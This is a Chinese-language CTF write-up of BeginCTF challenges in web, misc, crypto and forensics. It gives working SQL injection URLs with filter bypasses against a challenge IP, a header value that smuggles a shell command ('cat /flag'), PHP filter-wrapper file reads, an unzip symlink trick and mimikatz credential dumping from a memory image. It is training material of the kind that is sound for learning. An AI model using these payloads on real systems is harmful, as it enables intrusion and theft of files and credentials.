BeginCTF WriteUp
感觉还是太菜了,最后甚至没有进前100,也有投入时间一般的原因,学一点其他方向然后后面方便打校赛吧
Web
Popgadget
https://bbs.kanxue.com/thread-271714.htm
wc,对于php的各种pop链还是太生疏了
zupload
审计源码然后将action改为/flag即可获取flag
zupload-pro
直接用php伪协议读取php://filter/read=convert.base64-encode/resource=/flag
zupload-pro-plus-max
一直在卡我的题目,后面看了wp才知道include解析zip包中的php代码即可
zupload-pro-max
同样用php伪协议读取php://filter/read=convert.base64-encode/resource=/flag
zupload-pro-plus-max-ultra
代码中有
1 | $extract_to = $_SERVER['HTTP_X_EXTRACT_TO'] ?? 'uploads/'; |
直接往 Header 中传入 X-EXTRACT-TO: .; cat /flag > flag.txt
随便上传个文件,然后访问 /flag.txt
把 Flag 下载下来就行了。
zupload-pro-plus-max-ultra-premium
这题是 Unzip 软链接漏洞,先准备个 Payload:
1 | touch /flag |
上传后再下载 /uploads/flag
就行了。
sql教学局
感觉比较简单的sql注入!甚至有回显
主要是用双写和/**/绕过空格,感觉跟信息安全综合实践二的web题差不多
flag
第一段:flag{f5729aaa-
http://101.32.220.189:31777/challenge.php?user=1'/**/union/**/selselectect/**/flag/**/frfromom/**/secret.passwoorrd%23
第二段:3d49-475e-9731 http://101.32.220.189:31777/challenge.php?user=1'/**/union/**/selselectect/**/grade/**/frfromom/**/scoorre/**/where/**/student/**/like/**/'begin'%23
第三段:-e15fd5d2891d}
爆字段:
http://101.32.220.189:32067/challenge.php?user=1'/**/union/**/selselectect/**/group_concat(column_name)/**/frfromom/**/infoorrmation_schema.columns/**/where/**/table_name/**/like/**/'scoorre'%23
flag{f5729aaa-3d49-475e-9731-e15fd5d2891d}
Misc
tupper
先base64再
check ln
直接base32转码
devils’s word
先转换语言,然后搜索发现是温州话,之前找到过魔鬼语言温州话,但是没具体往下走
1 | with open("devil's word.txt", 'r') as f: |
where is crazyman 1.0
直接google搜图然后发现为秋叶原
where is crazyman v2.0
直接google搜图找到facebook
然后发现即可
Crypto
感觉对RSA算法的理解有问题
这是一个多素数RSA算法问题
1 | from Crypto.Util.number import * |
Forensics
Begin Forensics
直接网上搜到一个解混淆的脚本,然后一跑即可发现flag
逆向工程(reverse)入门指南
有不可见字符,直接复制粘贴出来即为flag
学取证咯 - cmd
直接cmdline可以发现flag
学取证咯-还记得ie吗学取证咯 - 还记得 ie 吗?
$ vol.py -f 学取证咯.raw –profile=Win7SP1x64 iehistory
学取证咯 - 计算机的姓名?
$ vol.py -f 学取证咯.raw –profile=Win7SP1x64 printkey -K “ControlSet001\Control\ComputerName\ComputerName”
学取证咯 - 想登录我的计算机吗?
mimikatz一把梭
1 | vol.py -f 学取证咯.raw --profile=Win7SP1x64 mimikatz |
学取证咯 - 机密文件
filescan 扫描到桌面有个机密文件.docx,dump 下来打开就是了
学取证咯 - 真的是取证吗?
关键逻辑如下:
桌面有个 flag_is_here.exe, dump 下来,ida 搜 flag 然后交叉引用找到关键函数,发现就一个简单的异或 FLAG_KEY 不知道,直接根据密文的第一位和 flag 的 f 异或,得到 key 为 121
; DATA XREF: sub_401460+102↑o
.rdata:0040B06D unk_40B06D db 0BBh ; DATA XREF: sub_401460+112↑o
这里指交叉引用(说的是哪里引用了这部分)
`data =[31, 21, 24, 30, 2, 32, 73, 15,
74, 38, 21, 74, 57, 11, 23, 74,
29, 38, 17, 73, 15, 15, 38, 13,
73, 38, 31, 73, 11, 74, 23, 76,
16, 26, 76, 4]
for i in data:
print(chr(i ^ 121), end=””)
饥渴 C 猫 is hacker!
看一位师傅的wp发现
payload.bin 是使用 USB Rubber Ducky 编译 DuckyScript 后生成的文件 github 找到解析工具 Duck-Decoder 解析 payload.bin 就能看到 flag 了